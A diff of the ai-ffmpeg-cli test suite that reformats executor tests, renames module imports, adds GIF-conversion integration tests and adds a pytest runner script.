        mock_subprocess.return_value = mock_result

        result = run(commands, confirm=True, dry_run=False, show_preview=True, assume_yes=False)
        result = run(
            commands, confirm=True, dry_run=False, show_preview=True, assume_yes=False
        )

        assert result == 0
        mock_subprocess.assert_called_once_with(commands[0], check=True)
@@ -275,7 +277,9 @@ class TestRun:
        commands = [["ffmpeg", "-i", "input.mp4", "output.mp4"]]
        mock_overwrite.return_value = False

        result = run(commands, confirm=True, dry_run=False, show_preview=True, assume_yes=False)
        result = run(
            commands, confirm=True, dry_run=False, show_preview=True, assume_yes=False
        )

        assert result == 1  # Cancelled

@@ -313,7 +317,9 @@ class TestRun:
        mock_result.returncode = 0
        mock_subprocess.return_value = mock_result

        result = run(commands, confirm=True, dry_run=False, show_preview=True, assume_yes=False)
        result = run(
            commands, confirm=True, dry_run=False, show_preview=True, assume_yes=False
        )

        assert result == 0
        assert mock_subprocess.call_count == 2
@@ -324,7 +330,9 @@ class TestRun:
    @patch("ai_ffmpeg_cli.executor.preview")
    @patch("ai_ffmpeg_cli.executor._check_overwrite_protection")
    @patch("ai_ffmpeg_cli.executor.subprocess.run")
    def test_run_second_command_fails(self, mock_subprocess, mock_overwrite, mock_preview):
    def test_run_second_command_fails(
        self, mock_subprocess, mock_overwrite, mock_preview
    ):
        """Test when second command fails."""
        commands = [
            ["ffmpeg", "-i", "input1.mp4", "output1.mp4"],
@@ -372,7 +380,11 @@ class TestRun:
        mock_result.returncode = 0
        mock_subprocess.return_value = mock_result

        result = run(commands, confirm=True, dry_run=False, show_preview=False, assume_yes=True)
        result = run(
            commands, confirm=True, dry_run=False, show_preview=False, assume_yes=True
        )

        assert result == 0
        mock_overwrite.assert_called_once_with(commands, True)  # assume_yes passed through
        mock_overwrite.assert_called_once_with(
            commands, True
        )  # assume_yes passed through
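The recurring change in these hunks is moving patches from the `Console` class to a module-level `console` instance, so assertions land on the mock itself rather than on `Console.return_value`. A minimal sketch of that distinction, using a hypothetical stand-in module instead of `ai_ffmpeg_cli.executor`:

```python
from unittest.mock import Mock, patch


class FakeExecutorModule:
    # Hypothetical stand-in for a module that holds a shared rich console instance.
    console = Mock()


# Patching the shared instance: code that calls FakeExecutorModule.console.print(...)
# hits the patch's mock directly, so the test asserts on mock_console.print,
# not on Console.return_value.print as with the old class-level patch.
with patch.object(FakeExecutorModule, "console") as mock_console:
    FakeExecutorModule.console.print("preview table")
    mock_console.print.assert_called_once_with("preview table")

print("ok")
```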
125
tests/integration/test_gif_conversion.py
Normal file
@@ -0,0 +1,125 @@
"""Integration tests for GIF conversion functionality."""
|
||||
|
||||
import pytest
|
||||
|
||||
from ai_ffmpeg_cli.intent_models import Action
|
||||
from ai_ffmpeg_cli.intent_models import FfmpegIntent
|
||||
from ai_ffmpeg_cli.intent_router import route_intent
|
||||
|
||||
|
||||
class TestGifConversion:
|
||||
"""Test GIF conversion functionality."""
|
||||
|
||||
def test_gif_conversion_intent_creation(self):
|
||||
"""Test that GIF conversion creates the correct intent."""
|
||||
intent_data = {
|
||||
"action": "convert",
|
||||
"inputs": ["/path/to/test.mp4"],
|
||||
"filters": "fps=10,scale=320:-1:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse",
|
||||
}
|
||||
|
||||
intent = FfmpegIntent(**intent_data)
|
||||
|
||||
assert intent.action == Action.convert
|
||||
assert intent.filters == [
|
||||
"fps=10,scale=320:-1:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse"
|
||||
]
|
||||
assert len(intent.inputs) == 1
|
||||
assert str(intent.inputs[0]) == "/path/to/test.mp4"
|
||||
|
||||
def test_format_convert_requires_format_parameter(self):
|
||||
"""Test that format_convert action requires format parameter."""
|
||||
# This should fail
|
||||
intent_data = {
|
||||
"action": "format_convert",
|
||||
"inputs": ["/path/to/test.mp4"],
|
||||
# Missing format parameter
|
||||
}
|
||||
|
||||
with pytest.raises(ValueError, match="format_convert requires format parameter"):
|
||||
FfmpegIntent(**intent_data)
|
||||
|
||||
def test_format_convert_with_format_parameter(self):
|
||||
"""Test that format_convert works with format parameter."""
|
||||
intent_data = {
|
||||
"action": "format_convert",
|
||||
"inputs": ["/path/to/test.mp4"],
|
||||
"format": "gif",
|
||||
}
|
||||
|
||||
intent = FfmpegIntent(**intent_data)
|
||||
assert intent.action == Action.format_convert
|
||||
assert intent.format == "gif"
|
||||
|
||||
def test_convert_action_does_not_require_format(self):
|
||||
"""Test that convert action works without format parameter."""
|
||||
intent_data = {
|
||||
"action": "convert",
|
||||
"inputs": ["/path/to/test.mp4"],
|
||||
"filters": "fps=10,scale=320:-1:flags=lanczos",
|
||||
}
|
||||
|
||||
intent = FfmpegIntent(**intent_data)
|
||||
assert intent.action == Action.convert
|
||||
assert intent.filters == ["fps=10,scale=320:-1:flags=lanczos"]
|
||||
|
||||
def test_gif_conversion_routing(self, tmp_path):
|
||||
"""Test that GIF conversion routes correctly."""
|
||||
input_path = tmp_path / "test.mp4"
|
||||
input_path.touch()
|
||||
|
||||
intent = FfmpegIntent(
|
||||
action=Action.convert,
|
||||
inputs=[input_path],
|
||||
filters="fps=10,scale=320:-1:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse",
|
||||
)
|
||||
|
||||
plan = route_intent(intent, allowed_dirs=[tmp_path])
|
||||
|
||||
assert len(plan.entries) == 1
|
||||
entry = plan.entries[0]
|
||||
assert entry.input == input_path
|
||||
|
||||
# Check that the filter chain contains the expected components
|
||||
filter_chain = " ".join(entry.args)
|
||||
assert "fps=10" in filter_chain
|
||||
assert "scale=320:-1" in filter_chain
|
||||
assert "palettegen" in filter_chain
|
||||
assert "paletteuse" in filter_chain
|
||||
|
||||
def test_gif_conversion_with_output_directory(self, tmp_path):
|
||||
"""Test GIF conversion with output directory."""
|
||||
input_path = tmp_path / "test.mp4"
|
||||
input_path.touch()
|
||||
output_dir = tmp_path / "output"
|
||||
output_dir.mkdir()
|
||||
|
||||
intent = FfmpegIntent(
|
||||
action=Action.convert,
|
||||
inputs=[input_path],
|
||||
filters="fps=10,scale=320:-1:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse",
|
||||
)
|
||||
|
||||
plan = route_intent(intent, allowed_dirs=[tmp_path], output_dir=output_dir)
|
||||
|
||||
assert len(plan.entries) == 1
|
||||
entry = plan.entries[0]
|
||||
assert entry.input == input_path
|
||||
assert entry.output.parent == output_dir
|
||||
assert entry.output.suffix == ".mp4" # Default extension for convert action
|
||||
|
||||
def test_gif_conversion_example_from_prompt(self):
|
||||
"""Test the exact example from the updated system prompt."""
|
||||
intent_data = {
|
||||
"action": "convert",
|
||||
"inputs": ["/path/to/test.mp4"],
|
||||
"filters": "fps=10,scale=320:-1:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse",
|
||||
}
|
||||
|
||||
intent = FfmpegIntent(**intent_data)
|
||||
|
||||
assert intent.action == Action.convert
|
||||
assert "fps=10" in intent.filters[0]
|
||||
assert "scale=320:-1" in intent.filters[0]
|
||||
assert "palettegen" in intent.filters[0]
|
||||
assert "paletteuse" in intent.filters[0]
|
||||
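For reference, the palette filter chain exercised above corresponds, roughly, to an ffmpeg invocation of the following shape. This is a sketch assembled from the filter string in the tests, not the router's actual output; the earlier scaling tests suggest the router passes the graph via `-vf`, but the exact argv is the router's business:

```python
# The two-pass palette approach: split the stream, generate an optimized
# 256-color palette from one branch, and apply it to the other for a
# higher-quality GIF than the default dithering.
filters = (
    "fps=10,scale=320:-1:flags=lanczos,"
    "split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse"
)
cmd = ["ffmpeg", "-i", "input.mp4", "-vf", filters, "output.gif"]
print(" ".join(cmd))
```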
@@ -1,8 +1,8 @@
from pathlib import Path

from ai_ffmpeg_cli.intent_models import Action
from ai_ffmpeg_cli.intent_models import FfmpegIntent
from ai_ffmpeg_cli.intent_router import route_intent
from ai_ffmpeg_cli.nl_schema import Action
from ai_ffmpeg_cli.nl_schema import FfmpegIntent


def test_route_extract_audio_defaults_output_mp3():
@@ -1,9 +1,9 @@
import json

from ai_ffmpeg_cli.intent_models import Action
from ai_ffmpeg_cli.intent_models import FfmpegIntent
from ai_ffmpeg_cli.llm_client import LLMClient
from ai_ffmpeg_cli.llm_client import LLMProvider
from ai_ffmpeg_cli.nl_schema import Action
from ai_ffmpeg_cli.nl_schema import FfmpegIntent


class DummyProvider(LLMProvider):
tests/performance/__init__.py (new file, 5 lines)
@@ -0,0 +1,5 @@
+"""Performance tests for ai-ffmpeg-cli.
+
+This package contains performance tests that measure speed, memory usage, and scalability.
+Performance tests focus on ensuring the application meets performance requirements.
+"""
@@ -5,9 +5,9 @@ import argparse
 import concurrent.futures
 import time
 
+from ai_ffmpeg_cli.intent_models_extended import Action
+from ai_ffmpeg_cli.intent_models_extended import FfmpegIntent
 from ai_ffmpeg_cli.intent_router import route_intent
-from ai_ffmpeg_cli.intent_schema import Action
-from ai_ffmpeg_cli.intent_schema import FfmpegIntent
 
 
 def simulate_user_operation(user_id: int, operation_type: str = "convert"):
@@ -17,9 +17,9 @@ import time
 
 import psutil
 
+from ai_ffmpeg_cli.intent_models_extended import Action
+from ai_ffmpeg_cli.intent_models_extended import FfmpegIntent
 from ai_ffmpeg_cli.intent_router import route_intent
-from ai_ffmpeg_cli.intent_schema import Action
-from ai_ffmpeg_cli.intent_schema import FfmpegIntent
 
 
 def monitor_memory_usage():
tests/run_tests.py (new executable file, 126 lines)
@@ -0,0 +1,126 @@
+#!/usr/bin/env python3
+"""Test runner script for ai-ffmpeg-cli.
+
+This script provides convenient commands to run different test categories
+with various options and configurations.
+"""
+
+import argparse
+import subprocess
+import sys
+from pathlib import Path
+
+
+def run_command(cmd, description):
+    """Run a command and handle errors."""
+    print(f"\n{'='*60}")
+    print(f"Running: {description}")
+    print(f"Command: {' '.join(cmd)}")
+    print(f"{'='*60}\n")
+
+    try:
+        result = subprocess.run(cmd, check=True, capture_output=False)
+        print(f"\n✅ {description} completed successfully!")
+        return True
+    except subprocess.CalledProcessError as e:
+        print(f"\n❌ {description} failed with exit code {e.returncode}")
+        return False
+
+
+def main():
+    """Main test runner function."""
+    parser = argparse.ArgumentParser(
+        description="Test runner for ai-ffmpeg-cli",
+        formatter_class=argparse.RawDescriptionHelpFormatter,
+        epilog="""
+Examples:
+  python run_tests.py unit                 # Run unit tests only
+  python run_tests.py integration --cov    # Run integration tests with coverage
+  python run_tests.py all --fast           # Run all fast tests
+  python run_tests.py security --verbose   # Run security tests with verbose output
+  python run_tests.py performance --slow   # Run performance tests (slow)
+""",
+    )
+
+    parser.add_argument(
+        "category",
+        choices=["unit", "integration", "e2e", "performance", "security", "all"],
+        help="Test category to run",
+    )
+
+    parser.add_argument(
+        "--cov", action="store_true", help="Run with coverage reporting"
+    )
+
+    parser.add_argument(
+        "--html", action="store_true", help="Generate HTML coverage report"
+    )
+
+    parser.add_argument("--verbose", "-v", action="store_true", help="Verbose output")
+
+    parser.add_argument("--fast", action="store_true", help="Run only fast tests")
+
+    parser.add_argument("--slow", action="store_true", help="Run only slow tests")
+
+    parser.add_argument(
+        "--parallel",
+        "-n",
+        type=int,
+        help="Run tests in parallel with specified number of workers",
+    )
+
+    parser.add_argument(
+        "--failed-first", action="store_true", help="Run failed tests first"
+    )
+
+    parser.add_argument(
+        "--tb",
+        choices=["auto", "long", "short", "line", "no"],
+        default="auto",
+        help="Traceback style",
+    )
+
+    args = parser.parse_args()
+
+    # Build pytest command
+    cmd = ["python", "-m", "pytest"]
+
+    # Add test path based on category
+    if args.category == "all":
+        cmd.append("tests/")
+    else:
+        cmd.append(f"tests/{args.category}/")
+
+    # Add coverage options
+    if args.cov:
+        cmd.extend(["--cov=ai_ffmpeg_cli", "--cov-report=term-missing"])
+        if args.html:
+            cmd.append("--cov-report=html")
+
+    # Add speed filters (marker and value must be separate argv entries)
+    if args.fast:
+        cmd.extend(["-m", "fast"])
+    elif args.slow:
+        cmd.extend(["-m", "slow"])
+
+    # Add other options
+    if args.verbose:
+        cmd.append("-v")
+
+    if args.parallel:
+        cmd.extend(["-n", str(args.parallel)])
+
+    if args.failed_first:
+        cmd.append("--ff")
+
+    cmd.extend(["--tb", args.tb])
+
+    # Run the command
+    success = run_command(cmd, f"{args.category.title()} Tests")
+
+    if not success:
+        sys.exit(1)
+
+
+if __name__ == "__main__":
+    main()
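The command-assembly logic in `run_tests.py` above can be exercised in isolation; `build_pytest_cmd` below is an illustrative reduction of `main()` (argument parsing and execution omitted), not a function the repo exports:

```python
# Hypothetical standalone reduction of run_tests.py's command assembly.
def build_pytest_cmd(category: str, cov: bool = False, verbose: bool = False) -> list[str]:
    """Build the pytest argv list for a test category, as run_tests.py does."""
    cmd = ["python", "-m", "pytest"]
    # "all" runs the whole tests/ tree; anything else selects a subdirectory.
    cmd.append("tests/" if category == "all" else f"tests/{category}/")
    if cov:
        cmd.extend(["--cov=ai_ffmpeg_cli", "--cov-report=term-missing"])
    if verbose:
        cmd.append("-v")
    return cmd


cmd = build_pytest_cmd("unit", cov=True)
```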
tests/security/__init__.py (new file, 5 lines)
@@ -0,0 +1,5 @@
+"""Security tests for ai-ffmpeg-cli.
+
+This package contains security tests that verify input validation, path security, and vulnerability prevention.
+Security tests focus on ensuring the application is secure against various attack vectors.
+"""
@@ -3,10 +3,10 @@
 from pathlib import Path
 from unittest.mock import patch
 
-from ai_ffmpeg_cli.file_security import ensure_parent_dir
-from ai_ffmpeg_cli.file_security import expand_globs
-from ai_ffmpeg_cli.file_security import is_safe_path
-from ai_ffmpeg_cli.file_security import most_recent_file
+from ai_ffmpeg_cli.path_security import ensure_parent_dir
+from ai_ffmpeg_cli.path_security import expand_globs
+from ai_ffmpeg_cli.path_security import is_safe_path
+from ai_ffmpeg_cli.path_security import most_recent_file
 
 
 class TestExpandGlobs:
@@ -19,7 +19,7 @@ class TestExpandGlobs:
         (tmp_path / "file2.txt").touch()
         (tmp_path / "other.log").touch()
 
-        with patch("ai_ffmpeg_cli.file_security.glob.glob") as mock_glob:
+        with patch("ai_ffmpeg_cli.path_security.glob.glob") as mock_glob:
             mock_glob.return_value = [
                 str(tmp_path / "file1.txt"),
                 str(tmp_path / "file2.txt"),
@@ -34,7 +34,7 @@ class TestExpandGlobs:
 
     def test_expand_multiple_patterns(self, tmp_path):
         """Test expanding multiple glob patterns."""
-        with patch("ai_ffmpeg_cli.file_security.glob.glob") as mock_glob:
+        with patch("ai_ffmpeg_cli.path_security.glob.glob") as mock_glob:
             # Mock different returns for different patterns
             def mock_glob_side_effect(pattern, recursive=True):
                 if pattern == "*.txt":
@@ -54,7 +54,7 @@ class TestExpandGlobs:
 
     def test_expand_no_matches(self):
         """Test expanding pattern with no matches."""
-        with patch("ai_ffmpeg_cli.file_security.glob.glob", return_value=[]):
+        with patch("ai_ffmpeg_cli.path_security.glob.glob", return_value=[]):
             result = expand_globs(["*.nonexistent"])
 
         assert result == []
@@ -66,7 +66,7 @@ class TestExpandGlobs:
 
     def test_expand_recursive_pattern(self, tmp_path):
         """Test expanding recursive glob patterns."""
-        with patch("ai_ffmpeg_cli.file_security.glob.glob") as mock_glob:
+        with patch("ai_ffmpeg_cli.path_security.glob.glob") as mock_glob:
             mock_glob.return_value = [
                 str(tmp_path / "dir1" / "file.txt"),
                 str(tmp_path / "dir2" / "file.txt"),
@@ -81,7 +81,7 @@ class TestExpandGlobs:
         """Test that duplicate paths are removed."""
         duplicate_path = str(tmp_path / "duplicate.txt")
 
-        with patch("ai_ffmpeg_cli.file_security.glob.glob") as mock_glob:
+        with patch("ai_ffmpeg_cli.path_security.glob.glob") as mock_glob:
             # Return same file from different patterns
             def mock_glob_side_effect(pattern, recursive=True):
                 return [duplicate_path]
@@ -96,7 +96,7 @@ class TestExpandGlobs:
 
     def test_expand_absolute_paths(self):
         """Test that returned paths are absolute."""
-        with patch("ai_ffmpeg_cli.file_security.glob.glob") as mock_glob:
+        with patch("ai_ffmpeg_cli.path_security.glob.glob") as mock_glob:
             mock_glob.return_value = ["relative/path.txt"]
 
             result = expand_globs(["*.txt"])
@@ -2,16 +2,16 @@
 
 from pathlib import Path
 
-from ai_ffmpeg_cli.io_utils import _is_safe_glob_pattern
-from ai_ffmpeg_cli.io_utils import expand_globs
-from ai_ffmpeg_cli.io_utils import is_safe_path
-from ai_ffmpeg_cli.io_utils import sanitize_filename
-from ai_ffmpeg_cli.io_utils import sanitize_user_input
-from ai_ffmpeg_cli.io_utils import validate_ffmpeg_command
-from ai_ffmpeg_cli.security import SecretStr
-from ai_ffmpeg_cli.security import mask_api_key
-from ai_ffmpeg_cli.security import sanitize_error_message
-from ai_ffmpeg_cli.security import validate_api_key_format
+from ai_ffmpeg_cli.credential_security import SecretStr
+from ai_ffmpeg_cli.credential_security import mask_api_key
+from ai_ffmpeg_cli.credential_security import sanitize_error_message
+from ai_ffmpeg_cli.credential_security import validate_api_key_format
+from ai_ffmpeg_cli.file_operations import _is_safe_glob_pattern
+from ai_ffmpeg_cli.file_operations import expand_globs
+from ai_ffmpeg_cli.file_operations import is_safe_path
+from ai_ffmpeg_cli.file_operations import sanitize_filename
+from ai_ffmpeg_cli.file_operations import sanitize_user_input
+from ai_ffmpeg_cli.file_operations import validate_ffmpeg_command
 
 
 class TestPathSecurity:
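Across both old and new module homes, the `expand_globs` tests above pin down the same contract: recursive glob expansion, absolute result paths, and de-duplication. A minimal sketch of that contract — assuming nothing about the repo's actual implementation, which also applies safety checks:

```python
# Hedged sketch of the expand_globs contract exercised by the tests above.
# Not the repo's implementation; it omits the pattern-safety validation.
import glob
from pathlib import Path


def expand_globs_sketch(patterns: list[str]) -> list[Path]:
    """Expand patterns recursively to unique absolute paths, first-seen order."""
    seen: dict[Path, None] = {}
    for pattern in patterns:
        for match in glob.glob(pattern, recursive=True):
            # resolve() makes the path absolute; the dict keeps insertion order
            seen.setdefault(Path(match).resolve(), None)
    return list(seen)


paths = expand_globs_sketch(["no_such_dir_xyz_123/*.nonexistent"])
```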
tests/unit/__init__.py (new file, 5 lines)
@@ -0,0 +1,5 @@
+"""Unit tests for ai-ffmpeg-cli.
+
+This package contains unit tests for individual components and functions.
+Unit tests focus on testing isolated functionality without external dependencies.
+"""
@@ -1,8 +1,8 @@
 from pathlib import Path
 
 from ai_ffmpeg_cli.command_builder import build_commands
-from ai_ffmpeg_cli.nl_schema import CommandEntry
-from ai_ffmpeg_cli.nl_schema import CommandPlan
+from ai_ffmpeg_cli.intent_models import CommandEntry
+from ai_ffmpeg_cli.intent_models import CommandPlan
 
 
 def test_convert_defaults_to_h264_aac():
@@ -8,7 +8,7 @@ from pydantic import ValidationError
 
 from ai_ffmpeg_cli.config import AppConfig
 from ai_ffmpeg_cli.config import load_config
-from ai_ffmpeg_cli.errors import ConfigError
+from ai_ffmpeg_cli.custom_exceptions import ConfigError
 
 
 class TestAppConfig:
@@ -28,14 +28,14 @@ class TestAppConfig:
         """Test configuration with explicit values."""
         config = AppConfig(
             openai_api_key="test-key",
-            model="gpt-4o-mini",
+            model="gpt-5",
             dry_run=True,
             confirm_default=False,
             timeout_seconds=120,
         )
 
         assert config.openai_api_key == "test-key"
-        assert config.model == "gpt-4o-mini"
+        assert config.model == "gpt-5"
         assert config.dry_run is True
         assert config.confirm_default is False
         assert config.timeout_seconds == 120
@@ -6,14 +6,14 @@ from pathlib import Path
 from unittest.mock import Mock
 from unittest.mock import patch
 
-from ai_ffmpeg_cli.context_scanner import _ffprobe_duration
-from ai_ffmpeg_cli.context_scanner import scan
+from ai_ffmpeg_cli.context_scanner_basic import _ffprobe_duration
+from ai_ffmpeg_cli.context_scanner_basic import scan
 
 
 class TestFfprobeDuration:
     """Test ffprobe duration extraction."""
 
-    @patch("ai_ffmpeg_cli.context_scanner.shutil.which")
+    @patch("ai_ffmpeg_cli.context_scanner_basic.shutil.which")
     def test_ffprobe_not_available(self, mock_which):
         """Test when ffprobe is not available."""
         mock_which.return_value = None
@@ -23,8 +23,8 @@ class TestFfprobeDuration:
         assert result is None
         mock_which.assert_called_once_with("ffprobe")
 
-    @patch("ai_ffmpeg_cli.context_scanner.shutil.which")
-    @patch("ai_ffmpeg_cli.context_scanner.subprocess.run")
+    @patch("ai_ffmpeg_cli.context_scanner_basic.shutil.which")
+    @patch("ai_ffmpeg_cli.context_scanner_basic.subprocess.run")
     def test_ffprobe_success(self, mock_run, mock_which):
         """Test successful ffprobe duration extraction."""
         mock_which.return_value = "/usr/bin/ffprobe"
@@ -53,8 +53,8 @@ class TestFfprobeDuration:
             text=True,
         )
 
-    @patch("ai_ffmpeg_cli.context_scanner.shutil.which")
-    @patch("ai_ffmpeg_cli.context_scanner.subprocess.run")
+    @patch("ai_ffmpeg_cli.context_scanner_basic.shutil.which")
+    @patch("ai_ffmpeg_cli.context_scanner_basic.subprocess.run")
     def test_ffprobe_no_duration(self, mock_run, mock_which):
         """Test ffprobe response without duration."""
         mock_which.return_value = "/usr/bin/ffprobe"
@@ -68,8 +68,8 @@ class TestFfprobeDuration:
 
         assert result is None
 
-    @patch("ai_ffmpeg_cli.context_scanner.shutil.which")
-    @patch("ai_ffmpeg_cli.context_scanner.subprocess.run")
+    @patch("ai_ffmpeg_cli.context_scanner_basic.shutil.which")
+    @patch("ai_ffmpeg_cli.context_scanner_basic.subprocess.run")
     def test_ffprobe_invalid_duration(self, mock_run, mock_which):
         """Test ffprobe response with invalid duration."""
         mock_which.return_value = "/usr/bin/ffprobe"
@@ -83,8 +83,8 @@ class TestFfprobeDuration:
 
         assert result is None
 
-    @patch("ai_ffmpeg_cli.context_scanner.shutil.which")
-    @patch("ai_ffmpeg_cli.context_scanner.subprocess.run")
+    @patch("ai_ffmpeg_cli.context_scanner_basic.shutil.which")
+    @patch("ai_ffmpeg_cli.context_scanner_basic.subprocess.run")
     def test_ffprobe_subprocess_error(self, mock_run, mock_which):
         """Test ffprobe subprocess error."""
         mock_which.return_value = "/usr/bin/ffprobe"
@@ -94,8 +94,8 @@ class TestFfprobeDuration:
 
         assert result is None
 
-    @patch("ai_ffmpeg_cli.context_scanner.shutil.which")
-    @patch("ai_ffmpeg_cli.context_scanner.subprocess.run")
+    @patch("ai_ffmpeg_cli.context_scanner_basic.shutil.which")
+    @patch("ai_ffmpeg_cli.context_scanner_basic.subprocess.run")
     def test_ffprobe_json_decode_error(self, mock_run, mock_which):
         """Test ffprobe with invalid JSON response."""
         mock_which.return_value = "/usr/bin/ffprobe"
@@ -122,8 +122,11 @@ class TestScan:
         (tmp_path / "text.txt").write_bytes(b"text file")
 
         with (
-            patch("ai_ffmpeg_cli.context_scanner.Path.cwd", return_value=tmp_path),
-            patch("ai_ffmpeg_cli.context_scanner._ffprobe_duration", return_value=120.0),
+            patch("ai_ffmpeg_cli.context_scanner_basic.Path.cwd", return_value=tmp_path),
+            patch(
+                "ai_ffmpeg_cli.context_scanner_basic._ffprobe_duration",
+                return_value=120.0,
+            ),
         ):
             result = scan()
 
@@ -148,7 +151,7 @@ class TestScan:
         (tmp_path / "movie.mov").write_bytes(b"fake movie")
         (tmp_path / "song.wav").write_bytes(b"fake song")
 
-        with patch("ai_ffmpeg_cli.context_scanner._ffprobe_duration", return_value=None):
+        with patch("ai_ffmpeg_cli.context_scanner_basic._ffprobe_duration", return_value=None):
             result = scan(cwd=tmp_path)
 
         assert result["cwd"] == str(tmp_path)
@@ -159,7 +162,7 @@ class TestScan:
         assert "song.wav" in audio_names
         assert result["images"] == []
 
-    @patch("ai_ffmpeg_cli.context_scanner.most_recent_file")
+    @patch("ai_ffmpeg_cli.context_scanner_basic.most_recent_file")
     def test_scan_with_most_recent_video(self, mock_most_recent, tmp_path):
         """Test scanning with most recent video detection."""
         # Create test files
@@ -168,13 +171,13 @@ class TestScan:
 
         mock_most_recent.return_value = tmp_path / "new.mp4"
 
-        with patch("ai_ffmpeg_cli.context_scanner._ffprobe_duration", return_value=60.0):
+        with patch("ai_ffmpeg_cli.context_scanner_basic._ffprobe_duration", return_value=60.0):
             result = scan(cwd=tmp_path)
 
         assert result["most_recent_video"] == str(tmp_path / "new.mp4")
         mock_most_recent.assert_called_once()
 
-    @patch("ai_ffmpeg_cli.context_scanner.most_recent_file")
+    @patch("ai_ffmpeg_cli.context_scanner_basic.most_recent_file")
     def test_scan_no_most_recent_video(self, mock_most_recent, tmp_path):
         """Test scanning when no most recent video is found."""
         mock_most_recent.return_value = None
@@ -201,7 +204,7 @@ class TestScan:
         (tmp_path / "audio.MP3").write_bytes(b"fake audio")
         (tmp_path / "image.PNG").write_bytes(b"fake image")
 
-        with patch("ai_ffmpeg_cli.context_scanner._ffprobe_duration", return_value=None):
+        with patch("ai_ffmpeg_cli.context_scanner_basic._ffprobe_duration", return_value=None):
             result = scan(cwd=tmp_path)
 
         video_names = [Path(v).name for v in result["videos"]]
@@ -229,7 +232,7 @@ class TestScan:
         for filename in image_files:
             (tmp_path / filename).write_bytes(b"fake image")
 
-        with patch("ai_ffmpeg_cli.context_scanner._ffprobe_duration", return_value=None):
+        with patch("ai_ffmpeg_cli.context_scanner_basic._ffprobe_duration", return_value=None):
             result = scan(cwd=tmp_path)
 
         # Extract filenames from full paths
@@ -257,7 +260,7 @@ class TestScan:
         # Create file in main directory
         (tmp_path / "main.mp4").write_bytes(b"fake video")
 
-        with patch("ai_ffmpeg_cli.context_scanner._ffprobe_duration", return_value=None):
+        with patch("ai_ffmpeg_cli.context_scanner_basic._ffprobe_duration", return_value=None):
             result = scan(cwd=tmp_path)
 
         # Extract filenames from full paths
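The `TestScan` cases above imply a compact contract for `scan()`: a dict with `cwd` plus extension-bucketed `videos`/`audios`/`images` lists, matched case-insensitively. `scan_sketch` below is a hypothetical stand-in that satisfies just that bucketing contract; the real `context_scanner_basic.scan` also probes durations with ffprobe and tracks the most recent video:

```python
# Illustrative sketch of the scan() contract the tests above rely on.
from pathlib import Path

# Extension sets are assumptions for this sketch; the repo's lists may differ.
VIDEO_EXTS = {".mp4", ".mov", ".mkv", ".webm", ".avi"}
AUDIO_EXTS = {".mp3", ".wav", ".aac", ".flac"}
IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif", ".bmp"}


def scan_sketch(cwd: Path) -> dict:
    """Bucket files in cwd by extension (case-insensitively); report cwd as str."""
    result = {"cwd": str(cwd), "videos": [], "audios": [], "images": []}
    for path in sorted(cwd.iterdir()):
        ext = path.suffix.lower()  # case-insensitive: .MOV matches .mov
        if ext in VIDEO_EXTS:
            result["videos"].append(str(path))
        elif ext in AUDIO_EXTS:
            result["audios"].append(str(path))
        elif ext in IMAGE_EXTS:
            result["images"].append(str(path))
    return result
```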
@@ -3,10 +3,10 @@
 from pathlib import Path
 from unittest.mock import patch
 
-from ai_ffmpeg_cli.io_utils import ensure_parent_dir
-from ai_ffmpeg_cli.io_utils import expand_globs
-from ai_ffmpeg_cli.io_utils import is_safe_path
-from ai_ffmpeg_cli.io_utils import most_recent_file
+from ai_ffmpeg_cli.file_operations import ensure_parent_dir
+from ai_ffmpeg_cli.file_operations import expand_globs
+from ai_ffmpeg_cli.file_operations import is_safe_path
+from ai_ffmpeg_cli.file_operations import most_recent_file
 
 
 class TestExpandGlobs:
@@ -19,7 +19,7 @@ class TestExpandGlobs:
         (tmp_path / "file2.txt").touch()
         (tmp_path / "other.log").touch()
 
-        with patch("ai_ffmpeg_cli.io_utils.glob.glob") as mock_glob:
+        with patch("ai_ffmpeg_cli.file_operations.glob.glob") as mock_glob:
             mock_glob.return_value = [
                 str(tmp_path / "file1.txt"),
                 str(tmp_path / "file2.txt"),
@@ -34,7 +34,7 @@ class TestExpandGlobs:
 
     def test_expand_multiple_patterns(self, tmp_path):
         """Test expanding multiple glob patterns."""
-        with patch("ai_ffmpeg_cli.io_utils.glob.glob") as mock_glob:
+        with patch("ai_ffmpeg_cli.file_operations.glob.glob") as mock_glob:
             # Mock different returns for different patterns
             def mock_glob_side_effect(pattern, recursive=True):
                 if pattern == "*.txt":
@@ -54,7 +54,7 @@ class TestExpandGlobs:
 
     def test_expand_no_matches(self):
         """Test expanding pattern with no matches."""
-        with patch("ai_ffmpeg_cli.io_utils.glob.glob", return_value=[]):
+        with patch("ai_ffmpeg_cli.file_operations.glob.glob", return_value=[]):
             result = expand_globs(["*.nonexistent"])
 
         assert result == []
@@ -66,7 +66,7 @@ class TestExpandGlobs:
 
     def test_expand_recursive_pattern(self, tmp_path):
         """Test expanding recursive glob patterns."""
-        with patch("ai_ffmpeg_cli.io_utils.glob.glob") as mock_glob:
+        with patch("ai_ffmpeg_cli.file_operations.glob.glob") as mock_glob:
             mock_glob.return_value = [
                 str(tmp_path / "dir1" / "file.txt"),
                 str(tmp_path / "dir2" / "file.txt"),
@@ -81,7 +81,7 @@ class TestExpandGlobs:
         """Test that duplicate paths are removed."""
         duplicate_path = str(tmp_path / "duplicate.txt")
 
-        with patch("ai_ffmpeg_cli.io_utils.glob.glob") as mock_glob:
+        with patch("ai_ffmpeg_cli.file_operations.glob.glob") as mock_glob:
             # Return same file from different patterns
             def mock_glob_side_effect(pattern, recursive=True):
                 return [duplicate_path]
@@ -96,7 +96,7 @@ class TestExpandGlobs:
 
     def test_expand_absolute_paths(self):
         """Test that returned paths are absolute."""
-        with patch("ai_ffmpeg_cli.io_utils.glob.glob") as mock_glob:
+        with patch("ai_ffmpeg_cli.file_operations.glob.glob") as mock_glob:
             mock_glob.return_value = ["relative/path.txt"]
 
             result = expand_globs(["*.txt"])
@@ -5,11 +5,11 @@ from pathlib import Path
 import pytest
 from pydantic import ValidationError
 
-from ai_ffmpeg_cli.nl_schema import Action
-from ai_ffmpeg_cli.nl_schema import CommandEntry
-from ai_ffmpeg_cli.nl_schema import CommandPlan
